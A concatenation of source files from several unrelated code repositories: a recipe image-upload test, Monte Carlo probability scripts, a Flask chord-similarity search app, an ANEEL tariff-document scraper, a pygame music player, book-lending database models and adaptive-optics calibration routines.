self.recipe = sample_recipe(user=self.user)
def tearDown(self):
self.recipe.image.delete()
def test_upload_image_to_recipe(self):
"""Test uploading an image to recipe"""
url = image_upload_url(self.recipe.id)
with tempfile.NamedTemporaryFile(suffix='.jpg') as ntf:
img = Image.new('RGB', (10, 10))
img.save(ntf, format='JPEG')
ntf.seek(0)
res = self.client.post(url, {'image': ntf}, format='multipart')
self.recipe.refresh_from_db()
self.assertEqual(res.status_code, status.HTTP_200_OK)
self.assertIn('image', res.data)
self.assertTrue(os.path.exists(self.recipe.image.path))
def test_upload_image_bad_request(self):
"""Test uploading an invalid image"""
url = image_upload_url(self.recipe.id)
res = self.client.post(url, {'image': 'notimage'}, format='multipart')
self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
``` |
{
"source": "JoaoAreias/Brilliant",
"score": 3
} |
#### File: JoaoAreias/Brilliant/monte_carlo_fabric_of_space.py
```python
from time import sleep
import threading
import numpy as np
total = 0
dist = 0
def point():
return np.random.rand(2)
def simulation(runs=1):
global total
global dist
while runs:
p1 = point()
p2 = point()
dist += np.linalg.norm(p2-p1)
total += 1
runs -= 1
return dist/total
def run_simulation(runs=1, threads=4):
global dist
global total
default_threads = threading.active_count()
total_runs = runs
while runs:
active_threads = threading.active_count()
if active_threads - default_threads < threads:
print("%d%% finnished" % (100 - int(100*runs/total_runs)))
if runs >= 10000:
threading.Thread(target=simulation, kwargs={'runs':10000}).start()
runs -= 10000
else:
threading.Thread(target=simulation, kwargs={'runs':runs}).start()
runs = 0
while default_threads != threading.active_count():
pass
return dist/total
print("--- Stating simulation ---")
print(simulation(runs=10000000))
print(simulation(runs=10000000))
print(simulation(runs=10000000))
print(simulation(runs=10000000))
print(simulation(runs=10000000))
print(simulation(runs=10000000))
print(simulation(runs=10000000))
print(simulation(runs=10000000))
print(simulation(runs=10000000))
print(simulation(runs=10000000))
```
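A quick sanity check for the estimate above (illustrative addition, not part of the original repository): the mean distance between two uniform random points in the unit square has a known closed form, so the Monte Carlo average should approach it.

```python
# Closed-form mean distance between two uniform points in the unit square:
# (2 + sqrt(2) + 5*asinh(1)) / 15 ≈ 0.5214
import math

expected = (2 + math.sqrt(2) + 5 * math.asinh(1)) / 15
print(expected)  # the simulation above should converge to this value
```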
#### File: JoaoAreias/Brilliant/monte_carlo_tournament.py
```python
from numpy.random import choice
total = 0
wins = 0
def play():
players = ['D', 'L', 'M']
winner = choice(['D', 'L'])
loser = 'D' if winner == 'L' else 'L'
waiting = 'M'
while True:
match = [winner, waiting]
w2 = choice(match)
if winner == w2:
return winner
winner = w2
waiting = loser
loser = match[0] if match[0] != w2 else match[1]
def run(runs=1000):
global total
global wins
total += runs
while runs:
if play() == 'M':
wins += 1
runs -= 1
return wins / total
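# For reference (not in the original script): with fair games and the
# "winner stays on, first to win two in a row" rule, the classic analytic
# answer is P(M wins) = 2/7 ≈ 0.2857, which the estimates below should approach.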
print(run(1000000))
print(run(1000000))
print(run(1000000))
print(run(1000000))
print(run(1000000))
print(run(1000000))
print(run(1000000))
print(run(1000000))
print(run(1000000))
``` |
{
"source": "joaoarthurbm/ciframe",
"score": 3
} |
#### File: joaoarthurbm/ciframe/main.py
```python
import json
from flask import Flask, request
import sys
from musica import *
from collections import OrderedDict
import unicodedata
app = Flask(__name__)
def limpa_cifra(raw_cifra):
cifra = []
for m in raw_cifra:
if m.strip() != '':
# filter out tablature lines
if '|' in m:
acorde = m.split('|')[0].split()[0]
cifra.append(acorde)
# handle chords separated by spaces
else:
tokens = [token for token in m.split()]
cifra += tokens
return cifra
reload(sys)
sys.setdefaultencoding('utf8')
# csv columns
ARTISTA_ID = 0
MUSICA_ID = 1
ARTISTA = 2
MUSICA = 3
GENERO = 4
POPULARIDADE = 5
TOM = 6
SEQ_FAMOSA = 7
CIFRA = 8
TAM_PAGINA = 100
genero_musicas = {}
generos = set()
acordes = set()
sequencias = {'BmGDA' : 0,
'CGAmF' : 1,
'EmG' : 2,
'CA7DmG7' : 3,
'GmF' : 4,
'CC7FFm' : 5}
musicas_dict = {}
f = open('data/top/dataset_final.csv')
f.readline()
for line in f:
line = line.replace('"', '').replace('NA', '')[:-1]
musica = line.split(',')
musica[POPULARIDADE] = int(musica[POPULARIDADE].replace('.', ''))
if musica[CIFRA] != '':
musica[CIFRA] = limpa_cifra(musica[CIFRA].split(';'))
else:
musica[CIFRA] = []
musica[SEQ_FAMOSA] = musica[SEQ_FAMOSA].split(";")
# unique set of genres
generos.add(musica[GENERO])
# add the song to the songs dict
musica_obj = Musica(musica[ARTISTA_ID], musica[ARTISTA],
musica[MUSICA_ID], musica[MUSICA], musica[GENERO],
int(musica[POPULARIDADE]), musica[SEQ_FAMOSA],
musica[TOM], musica[CIFRA])
musicas_dict[musica_obj.id_unico_musica] = musica_obj
# unique set of chords
for acorde in musica_obj.acordes:
acordes.add(acorde)
# build a dict mapping genre to songs;
# used to speed up the searches
if musica_obj.genero in genero_musicas:
genero_musicas[musica_obj.genero].append(musica_obj)
else:
genero_musicas[musica_obj.genero] = [musica_obj]
# dict of songs whose values are sorted by popularity
musicas = OrderedDict(sorted(musicas_dict.items(),
key=lambda x: x[1].popularidade, reverse = True))
# para trabalhar melhor com json
generos = list(generos)
# ordena genero_musicas por popularidade
for k,v in genero_musicas.items():
genero_musicas[k].sort(key = lambda x : x.popularidade, reverse = True)
f.close()
@app.route('/')
def index():
return app.send_static_file('index.html')
''' Searches for songs whose title or artist name contains the argument passed in key.
params: key and generos (optional). If generos is not given, the search does not filter by genre.
example 1: /search?key=no dia em que eu saí de casa
example 2: /search?key=no dia em que eu saí de casa&generos=Rock,Samba '''
@app.route('/<path:path>')
def static_proxy(path):
# send_static_file will guess the correct MIME type
return app.send_static_file(path)
@app.route('/search')
def busca():
generos_tag = request.args.get('generos', [])
pagina_tag = request.args.get('pagina','1')
keys = request.args.get('key').lower()
keys = remover_combinantes(keys).split(' ')
generos_key = generos
if generos_tag:
generos_key = generos_tag.encode('utf-8').split(',')
collection = apply_filtro(musicas.values(), generos_key)
out = []
for musica in collection:
text = '%s %s' % (musica.nome_artista.lower(), musica.nome_musica.lower())
text_list = remover_combinantes(unicode(text)).split(' ')
if all(key in text_list for key in keys):
matches = {
'id_unico_musica' : musica.id_unico_musica,
'id_artista' : musica.id_artista,
'id_musica' : musica.id_musica,
'nome_artista' : musica.nome_artista,
'nome_musica' : musica.nome_musica,
'genero' : musica.genero,
'url' : musica.url,
}
out.append(matches)
return json.dumps(get_pagina(out, pagina_tag))
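# Example request (illustrative, not part of the original file):
#   GET /search?key=no dia em que eu sai de casa&generos=Rock,Samba&pagina=1
# returns a JSON list with up to TAM_PAGINA matches, each carrying the song and
# artist ids, names, genre and url.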
# copy
def remover_combinantes(string):
string = unicodedata.normalize('NFD', string)
return u''.join(ch for ch in string if unicodedata.category(ch) != 'Mn')
''' Returns the songs stored in the system (sorted by popularity).
The service is paginated. Each page has size 100 by default.
params: pagina. If no page is given, the default value is 1.
example 1: /musica?pagina=2
example 2: /musica'''
@app.route('/musicas')
def get_musicas():
return json.dumps([v.__dict__ for v in musicas.values()])
@app.route('/generos')
def get_generos():
return json.dumps(generos)
@app.route('/acordes')
def get_acordes():
return json.dumps(list(acordes))
@app.route('/musica/<m_id>/')
def get_musica(m_id):
return json.dumps(musicas[m_id].__dict__)
@app.route('/similares')
def get_similares():
# parse the request arguments
acordes_tag = request.args.get('acordes')
id_musica_tag = request.args.get('id_unico_musica')
sequencia_tag = request.args.get('sequencia')
pagina_tag = request.args.get('pagina','1')
# if not given, filter by all genres.
generos_tag = request.args.get('generos')
generos_key = generos
if generos_tag:
generos_key = generos_tag.encode('utf-8').split(',')
acordes = []
if acordes_tag:
acordes = acordes_tag.encode('utf-8').split(',')
elif id_musica_tag:
musica = musicas[id_musica_tag]
acordes = musica.acordes
elif sequencia_tag:
acordes = sequencia_tag.encode('utf-8').replace(',','')
similares = []
if acordes in sequencias:
id_seq = sequencias[acordes]
similares = get_pagina(get_similares_por_sequencia(id_seq, generos_key), pagina_tag)
return json.dumps(similares)
similares = get_similares(acordes, generos_key, id_musica_tag)
return json.dumps(get_pagina(similares, pagina_tag))
def get_similares_por_sequencia(id_seq, generos_key):
# pre-filter by genre for better performance
collection = apply_filtro(musicas.values(), generos_key)
similares = []
for musica in collection:
if str(id_seq) in musica.seqs_famosas:
similar = {
'id_unico_musica' : musica.id_unico_musica,
'id_artista' : musica.id_artista,
'id_musica' : musica.id_musica,
'nome_artista' : musica.nome_artista,
'nome_musica' : musica.nome_musica,
'popularidade' : musica.popularidade,
'acordes' : musica.acordes,
'genero' : musica.genero,
'url' : musica.url,
}
similares.append(similar)
return similares
def get_pagina(colecao, pagina_tag):
sl = (int(pagina_tag) - 1)*TAM_PAGINA
return colecao[sl:sl+TAM_PAGINA]
def get_similares(acordes, generos_key, id_musica = None):
# pre-filter by genre for better performance
collection = apply_filtro(musicas.values(), generos_key)
similares = []
for musica in collection:
if musica.id_unico_musica != id_musica:
inter = set(acordes).intersection(set(musica.acordes))
diff = set(musica.acordes) - set(acordes)
# keep only songs that share at least one chord and that belong
# to the requested genres.
if len(inter) > 0:
similar = {
'id_unico_musica' : musica.id_unico_musica,
'id_artista' : musica.id_artista,
'id_musica' : musica.id_musica,
'nome_artista' : musica.nome_artista,
'nome_musica' : musica.nome_musica,
'popularidade' : musica.popularidade,
'acordes' : musica.acordes,
'genero' : musica.genero,
'url' : musica.url,
'diferenca' : list(diff),
'intersecao' : list(inter)
}
similares.append(similar)
# sorted by smallest difference, then largest intersection; the stable sort keeps the popularity order for ties.
return sorted(similares, key=lambda x: (len(x['diferenca']), -len(x['intersecao'])))
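# Worked example (illustrative): for acordes = ['C', 'G', 'Am', 'F'] and a song
# whose chords are ['C', 'G', 'Em'], intersecao = {'C', 'G'} and diferenca = {'Em'};
# results are ordered by fewest unmatched chords first, then by most shared chords.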
## Filter the song collection by genre.
def apply_filtro(musicas, generos_key):
# pre-filter by genre for better performance
collection = []
for genero in generos_key:
if genero in generos:
collection += genero_musicas[genero]
return collection
@app.after_request
def add_header(response):
response.headers['Access-Control-Allow-Origin'] = '*'
return response
if __name__ == '__main__':
app.run(debug=True)
``` |
{
"source": "joaoartursilveira/ANEELScraper",
"score": 3
} |
#### File: ANEELScraper/apps/coletor.py
```python
from time import sleep
from bs4 import BeautifulSoup
from datetime import datetime
from unidecode import unidecode
from .conexao_sql import SQLite
import re
def formatar_data(raw_date) -> str:
"""Formatar a data em Y/M/d"""
data_regex = re.compile(r"[\d]{1,2}/[\d]{1,2}/[\d]{4}")
data_formata = data_regex.findall(raw_date)[0].replace('/','-')
return datetime.strptime(data_formata, "%d-%m-%Y").strftime("%Y-%m-%d")
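# Example (illustrative): formatar_data('1/2/2021') -> '2021-02-01'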
def clear_string(string: str) -> str:
"""Retira caracteres especiais e espaços em branco"""
limpado = unidecode(''.join(char for char in string)).replace(' ', '').upper()
return ''.join(char for char in limpado if char.isalnum())
def localizar_arquivo(agente, data_processo, processo, arquivo,lista_link):
""""Procura os links que contenham o arquivo procurado (SPARTA ou PCAT)"""
if arquivo in lista_link['href'].upper():
agente_padrao = SQLite().info_agente(agente)
lista_processo = [agente_padrao, data_processo, processo, arquivo, lista_link['href']]
return lista_processo
def coletor_tr(driver):
"""Varredura da página procurando-se pelas planilhas de SPARTA e PCAT"""
sleep(2)
soup = BeautifulSoup(driver.page_source, features='html.parser')
driver.quit()
style = {'style': "padding-left: 5px; padding-bottom: 5px; padding-right: 5px; padding-top: 5px;"}
tabela_tr = soup.find_all('tr', style)[1::]
td_css = {'valign': 'top', 'class': 'linha2'}
lista_aneel = []
for linha in tabela_tr:
td = linha.find_all('td', td_css)
processo = clear_string(td[2])
if processo in ['REAJUSTE', 'REVISAO', 'REVISAOEXTRAORDINARIA']:
agente = clear_string(td[0])
data_processo = formatar_data(td[3].text)
for links in linha('a', href=True):
lista_sparta = localizar_arquivo(agente, data_processo, processo, 'SPARTA', links)
lista_pcat = localizar_arquivo(agente, data_processo, processo, 'PCAT', links)
if lista_sparta is not None:
lista_aneel.append(lista_sparta)
if lista_pcat is not None:
lista_aneel.append(lista_pcat)
return lista_aneel
``` |
{
"source": "JoaoAssalim/Mutano_Assistent",
"score": 3
} |
#### File: Mutano_Assistent/Tests/Test_PlayAndStopSong.py
```python
import os
from pathlib import Path
from random import choice
from pygame import mixer
def playAndStopSong():
pasta = os.getcwd()
Music_Folder = Path(pasta) / 'Musics'
SongsToPlay = []
for FileMain in os.walk(Music_Folder):
for File in FileMain[2]:
SongsToPlay.append(File)
PlayingSong = choice(SongsToPlay)
print(f'Playing: {PlayingSong}')
PlayMusicDirectory = Path(os.getcwd()) / 'Musics' / PlayingSong
mixer.init()
mixer.music.load(PlayMusicDirectory)
mixer.music.play()
input('Press Enter to Stop: ')
# any input (or just Enter) stops playback
mixer.music.pause()
playAndStopSong()
``` |
{
"source": "joaoassuncao/bookfree",
"score": 3
} |
#### File: app/models/tables.py
```python
from app import db
class User(db.Model):
id = db.Column(db.Integer, primary_key = True)
# Login
email = db.Column(db.String, unique = True, nullable = False)
password = db.Column(db.String, nullable = False)
#Info
name = db.Column(db.String)
cpf = db.Column(db.String)
gender = db.Column(db.String)
birthday = db.Column(db.Date)
def __repr__(self):
return "<User %r>" % self.email
class Book(db.Model):
id = db.Column(db.Integer, primary_key = True)
#Info
title = db.Column(db.String, nullable = False)
author = db.Column(db.String, nullable = False)
publisher = db.Column(db.String, nullable = False)
gender = db.Column(db.String, nullable = False)
isbn = db.Column(db.String)
def __repr__(self):
return "<Book %r>" % self.title
class Borrow(db.Model):
id = db.Column(db.Integer, primary_key = True)
#Info
id_lender = db.Column(db.Integer, nullable = False)
id_borrower = db.Column(db.Integer, nullable = False)
id_book = db.Column(db.Integer, nullable = False)
``` |
{
"source": "joao-aveiro/OOPAO",
"score": 2
} |
#### File: AO_modules/calibration/ao_calibration.py
```python
from astropy.io import fits as pfits
import numpy as np
from AO_modules.calibration.CalibrationVault import calibrationVault
from AO_modules.calibration.InteractionMatrix import interactionMatrix
from AO_modules.tools.tools import emptyClass,createFolder, read_fits
def ao_calibration_from_ao_obj(ao_obj, nameFolderIntMat = None, nameIntMat = None, nameFolderBasis = None, nameBasis = None, nMeasurements=50, index_modes = None, get_basis = True):
# check if the name of the basis is specified otherwise take the nominal name
if nameBasis is None:
if ao_obj.dm.isM4:
initName = 'M2C_M4_'
else:
initName = 'M2C_'
try:
nameBasis = initName+str(ao_obj.param['resolution'])+'_res'+ao_obj.param['extra']
except:
nameBasis = initName+str(ao_obj.param['resolution'])+'_res'
ao_calib_object = emptyClass()
# check if a name for the origin folder is specified
if nameFolderBasis is None:
nameFolderBasis = ao_obj.param['pathInput']
createFolder(nameFolderBasis)
## %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
# get the modal basis :
try:
print('Loading the KL Modal Basis from: ' + nameFolderBasis+nameBasis )
M2C = read_fits(nameFolderBasis+ nameBasis+'.fits')
if index_modes is None:
M2C = M2C[:,:ao_obj.param['nModes']]
else:
M2C = M2C[:,index_modes]
if get_basis:
ao_obj.dm.coefs = M2C
ao_obj.tel*ao_obj.dm
basis = np.reshape(ao_obj.tel.OPD,[ao_obj.tel.resolution**2,M2C.shape[1]])
ao_calib_object.basis = basis
if ao_obj.param['getProjector']:
print('Computing the pseudo-inverse of the modal basis...')
cross_product_basis = np.matmul(basis.T,basis)
non_diagonal_elements = np.sum(np.abs(cross_product_basis))-np.trace(cross_product_basis)
criteria = 1-np.abs(np.trace(cross_product_basis)-non_diagonal_elements)/np.trace(cross_product_basis)
if criteria <= 1e-3:
print('Diagonality criteria: ' + str(criteria) + ' -- using the fast computation')
projector = np.diag(1/np.diag(cross_product_basis))@basis.T
else:
print('Diagonality criteria: ' + str(criteria) + ' -- using the slow computation')
projector = np.linalg.pinv(basis)
ao_calib_object.projector = projector
except:
print('ERROR: No file found! Taking a zonal basis instead..' )
M2C = np.eye(ao_obj.dm.nValidAct)
## %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
if nameFolderIntMat is None:
nameFolderIntMat = ao_obj.param['pathInput']+ao_obj.param['name']+'/'
createFolder(nameFolderIntMat)
#% get the interaction matrix :
if nameIntMat is None:
if ao_obj.wfs.tag == 'pyramid':
try:
# case where the system name has an extra attribute
nameIntMat = 'zonal_interaction_matrix_'+str(ao_obj.param['resolution'])+'_res_'+str(ao_obj.param['modulation'])+'_mod_'+str(ao_obj.param['postProcessing'])+'_psfCentering_'+str(ao_obj.param['psfCentering'])+ao_obj.param['extra']
except:
nameIntMat = 'zonal_interaction_matrix_'+str(ao_obj.param['resolution'])+'_res_'+str(ao_obj.param['modulation'])+'_mod_'+str(ao_obj.param['postProcessing'])+'_psfCentering_'+str(ao_obj.param['psfCentering'])
if ao_obj.wfs.tag == 'shackHartmann':
if ao_obj.wfs.is_geometric:
nature = 'geometric'
else:
nature = 'diffractive'
try:
# case where the system name has an extra attribute
nameIntMat = 'zonal_interaction_matrix_'+str(ao_obj.param['resolution'])+'_res_'+str(ao_obj.wfs.nValidSubaperture)+'_subap_'+nature+'_'+ao_obj.param['extra']
except:
nameIntMat = 'zonal_interaction_matrix_'+str(ao_obj.param['resolution'])+'_res_'+str(ao_obj.wfs.nValidSubaperture)+'_subap_'+nature
try:
print('Loading Interaction matrix '+nameIntMat+'...')
imat = read_fits(nameFolderIntMat+nameIntMat+'.fits')
calib = calibrationVault(imat@M2C)
print('Done!')
except:
print('ERROR: No file found! Computing the zonal interaction matrix')
M2C_zon = np.eye(ao_obj.dm.nValidAct)
stroke =1e-9 # 1 nm amplitude
calib = interactionMatrix(ao_obj.ngs,ao_obj.atm,ao_obj.tel,ao_obj.dm,ao_obj.wfs,M2C_zon,stroke,phaseOffset = 0,nMeasurements = nMeasurements)
# save output in fits file
hdr=pfits.Header()
hdr['TITLE'] = 'INTERACTION MATRIX'
empty_primary = pfits.PrimaryHDU(header=hdr)
# primary_hdu = pfits.ImageHDU(calib.D.astype(np.float32))
primary_hdu = pfits.ImageHDU(calib.D)
hdu = pfits.HDUList([empty_primary, primary_hdu])
hdu.writeto(nameFolderIntMat + nameIntMat + '.fits', overwrite=True)
# project the zonal interaction matrix onto the modal basis so both branches return a modal calibration
calib = calibrationVault(calib.D@M2C)
## %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
#% get the modal gains matrix :
nameExtra = '_r0_'+str(100*ao_obj.atm.r0)+'_cm_'+ao_obj.param['opticalBand']+'_band_fitting_'+str(ao_obj.param['nModes'])+'_KL'
try:
nameModalGains = 'modal_gains'+ao_obj.param['extra']+nameExtra
except:
nameModalGains = 'modal_gains'+nameExtra
try:
data_gains = read_fits(nameFolderIntMat+ nameModalGains+'.fits')
print('Using Modal Gains loaded from '+str(nameFolderIntMat+ nameModalGains+'.fits'))
except:
data_gains = np.ones(M2C.shape[1])
print('No Modal Gains found. All gains set to 1')
ao_calib_object.gOpt = np.diag(1/data_gains)
ao_calib_object.M2C = M2C
ao_calib_object.calib = calib
return ao_calib_object
#%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
#%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
# same function using an ao object as an input
#%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
#%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
def ao_calibration(ngs, tel, atm, dm, wfs, param, nameFolderIntMat = None, nameIntMat = None, nameFolderBasis = None, nameBasis = None, nMeasurements=50, index_modes = None, get_basis = True):
# check if the name of the basis is specified otherwise take the nominal name
if nameBasis is None:
if dm.isM4:
initName = 'M2C_M4_'
else:
initName = 'M2C_'
try:
nameBasis = initName+str(param['resolution'])+'_res'+param['extra']
except:
nameBasis = initName+str(param['resolution'])+'_res'
ao_calib_object = emptyClass()
# check if a name for the origin folder is specified
if nameFolderBasis is None:
nameFolderBasis = param['pathInput']
createFolder(nameFolderBasis)
## %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
# get the modal basis :
try:
print('Loading the KL Modal Basis from: ' + nameFolderBasis+nameBasis )
M2C = read_fits(nameFolderBasis+ nameBasis+'.fits')
if index_modes is None:
M2C = M2C[:,:param['nModes']]
else:
M2C = M2C[:,index_modes]
if get_basis or param['getProjector']:
dm.coefs = M2C
tel*dm
basis = np.reshape(tel.OPD,[tel.resolution**2,M2C.shape[1]])
ao_calib_object.basis = basis
if param['getProjector']:
print('Computing the pseudo-inverse of the modal basis...')
cross_product_basis = np.matmul(basis.T,basis)
non_diagonal_elements = np.sum(np.abs(cross_product_basis))-np.trace(cross_product_basis)
criteria = 1-np.abs(np.trace(cross_product_basis)-non_diagonal_elements)/np.trace(cross_product_basis)
if criteria <= 1e-3:
print('Diagonality criteria: ' + str(criteria) + ' -- using the fast computation')
projector = np.diag(1/np.diag(cross_product_basis))@basis.T
else:
print('Diagonality criteria: ' + str(criteria) + ' -- using the slow computation')
projector = np.linalg.pinv(basis)
ao_calib_object.projector = projector
except:
print('ERROR: No file found! Taking a zonal basis instead..' )
M2C = np.eye(dm.nValidAct)
## %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
if nameFolderIntMat is None:
nameFolderIntMat = param['pathInput']+param['name']+'/'
createFolder(nameFolderIntMat)
#% get the interaction matrix :
if nameIntMat is None:
if wfs.tag == 'pyramid':
try:
# case where the system name has an extra attribute
nameIntMat = 'zonal_interaction_matrix_'+str(param['resolution'])+'_res_'+str(param['modulation'])+'_mod_'+str(param['postProcessing'])+'_psfCentering_'+str(param['psfCentering'])+param['extra']
except:
nameIntMat = 'zonal_interaction_matrix_'+str(param['resolution'])+'_res_'+str(param['modulation'])+'_mod_'+str(param['postProcessing'])+'_psfCentering_'+str(param['psfCentering'])
if wfs.tag == 'shackHartmann':
if wfs.is_geometric:
nature = 'geometric'
else:
nature = 'diffractive'
try:
# case where the system name has an extra attribute
nameIntMat = 'zonal_interaction_matrix_'+str(param['resolution'])+'_res_'+str(wfs.nValidSubaperture)+'_subap_'+nature+'_'+param['extra']
except:
nameIntMat = 'zonal_interaction_matrix_'+str(param['resolution'])+'_res_'+str(wfs.nValidSubaperture)+'_subap_'+nature
try:
print('Loading Interaction matrix '+nameIntMat+'...')
imat = read_fits(nameFolderIntMat+nameIntMat+'.fits')
calib = calibrationVault(imat@M2C)
print('Done!')
except:
M2C_zon = np.eye(dm.nValidAct)
stroke =1e-9 # 1 nm amplitude
calib = interactionMatrix(ngs, atm, tel, dm, wfs, M2C_zon, stroke, phaseOffset = 0, nMeasurements = nMeasurements)
# save output in fits file
hdr=pfits.Header()
hdr['TITLE'] = 'INTERACTION MATRIX'
empty_primary = pfits.PrimaryHDU(header=hdr)
# primary_hdu = pfits.ImageHDU(calib.D.astype(np.float32))
primary_hdu = pfits.ImageHDU(calib.D)
hdu = pfits.HDUList([empty_primary, primary_hdu])
hdu.writeto(nameFolderIntMat+nameIntMat+'.fits',overwrite=True)
calib = calibrationVault(calib.D@M2C)
## %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
#% get the modal gains matrix :
nameExtra = '_r0_'+str(100*atm.r0)+'_cm_'+param['opticalBand']+'_band_fitting_'+str(param['nModes'])+'_KL'
try:
nameModalGains = 'modal_gains'+param['extra']+nameExtra
except:
nameModalGains = 'modal_gains'+nameExtra
try:
data_gains = read_fits(nameFolderIntMat+ nameModalGains+'.fits')
print('Using Modal Gains loaded from '+str(nameFolderIntMat+ nameModalGains+'.fits'))
except:
data_gains = np.ones(M2C.shape[1])
print('No Modal Gains found. All gains set to 1')
ao_calib_object.gOpt = np.diag(1/data_gains)
ao_calib_object.M2C = M2C
ao_calib_object.calib = calib
return ao_calib_object
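# Typical use (illustrative sketch, assuming the usual OOPAO objects ngs, tel,
# atm, dm, wfs and the param dictionary were created beforehand):
#   ao_calib = ao_calibration(ngs, tel, atm, dm, wfs, param, nMeasurements=100)
#   M2C        = ao_calib.M2C       # modes-to-commands matrix actually used
#   imat_modal = ao_calib.calib.D   # modal interaction matrix
#   gOpt       = ao_calib.gOpt      # modal gains (identity if none found on disk)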
def get_modal_gains_from_ao_obj(ao_obj, nameFolderIntMat = None):
if nameFolderIntMat is None:
nameFolderIntMat = ao_obj.param['pathInput']+ao_obj.param['name']+'/'
createFolder(nameFolderIntMat)
## %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
#% get the modal gains matrix :
nameExtra = '_r0_'+str(100*ao_obj.atm.r0)+'_cm_'+ao_obj.param['opticalBand']+'_band_fitting_'+str(ao_obj.param['nModes'])+'_KL'
try:
nameModalGains = 'modal_gains'+ao_obj.param['extra']+nameExtra
except:
nameModalGains = 'modal_gains'+nameExtra
print('Looking for Modal Gains loaded from '+str(nameFolderIntMat+ nameModalGains+'.fits'))
try:
data_gains = read_fits(nameFolderIntMat+ nameModalGains+'.fits')
print('Using Modal Gains loaded from '+str(nameFolderIntMat+ nameModalGains+'.fits'))
except:
data_gains = np.ones(ao_obj.param['nModes'])
print('No Modal Gains found. All gains set to 1')
gOpt = np.diag(1/data_gains)
return gOpt
#%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
#%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
# same function using an ao object as an input
#%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
